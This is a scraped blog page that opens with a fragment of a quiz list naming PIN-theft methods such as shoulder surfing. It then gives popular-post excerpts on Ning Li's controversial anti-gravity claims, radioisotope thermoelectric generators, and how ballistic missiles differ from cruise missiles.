
B. Code surveillance

C. Shoulder surfing

D. Keypad capture

………………………………………………………………………………………………………………………………….334

Comments

Post a Comment

Popular posts from this blog

AC Gravity

what actually I’m trying to achieve is quite simple that , a device which can defy gravity while being efficient, So there is another theory called as AC GRAVITY this represents a set of experiments which would hopefully show the facts behind  anti-gravity Ning Li  is an American scientist known for her controversial claims about  anti-gravity  devices. She worked as a  physicist  at the Center for Space Plasma and Aeronomic Research,  University of Alabama in Huntsville , in the 1990s. In 1999, she left the university to form a company, AC Gravity, LLC, to continue anti-gravity research. In a series of papers co-authored with fellow university physicist Douglas Torr and published between 1991 and 1993, she claimed a practical way to produce anti-gravity effects.   She claimed that an anti-gravity effect could be produced by rotating ions creating a gravitomagnetic field perpendicular to their spin axis.   In her ...
Read more

Radioisotope thermoelectric generator

Image
A  radioisotope thermoelectric generator  ( RTG ,  RITEG ) is an  electrical generator It is an  electrical generator  that uses an array of  thermocouples  to convert the  heat released by the decay  of a suitable  radioactive  material into  electricity  by the  Seebeck effect . RTGs have been used as power sources in  satellites ,  space probes , and uncrewed remote facilities such as a series of  lighthouses  built by the former  Soviet Union  inside the  Arctic Circle . RTGs are usually the most desirable power source for unmaintained situations that need a few hundred  watts  (or less) of power for durations too long for  fuel cells , batteries, or generators to provide economically, and in places where  solar cells  are not practical. Safe use of RTGs requires containment of the  radioisotopes  long after the productive life of the un...
Read more

Differences between a Ballistic missile and a Cruise missile

Image
Missile is a weapon that is self-propelled or directed by remote control, carrying conventional or nuclear explosive.  There are three broad types of missiles Conventional guided missiles Cruise missiles Ballistic missiles Difference between cruise and ballistic missile  A Cruise Missile is a guided missile that flies with constant speed to deliver a warhead at specified target over long distance with high accuracy. A Ballistic Missile is launched directly into the high layers of the earth’s atmosphere. Cruise missile is classified by size, range, speed and launch type. Ballistic missile is classified based on its range, maximum distance measured along the earth’s ellipsoid from point of launch to point of impact of last element of their payload. Cruise missile flies with in earth’s atmosphere and use jet engine technology. Cruise missiles are known specifically for low-level flight which is staying relatively close to the surfa...
Read more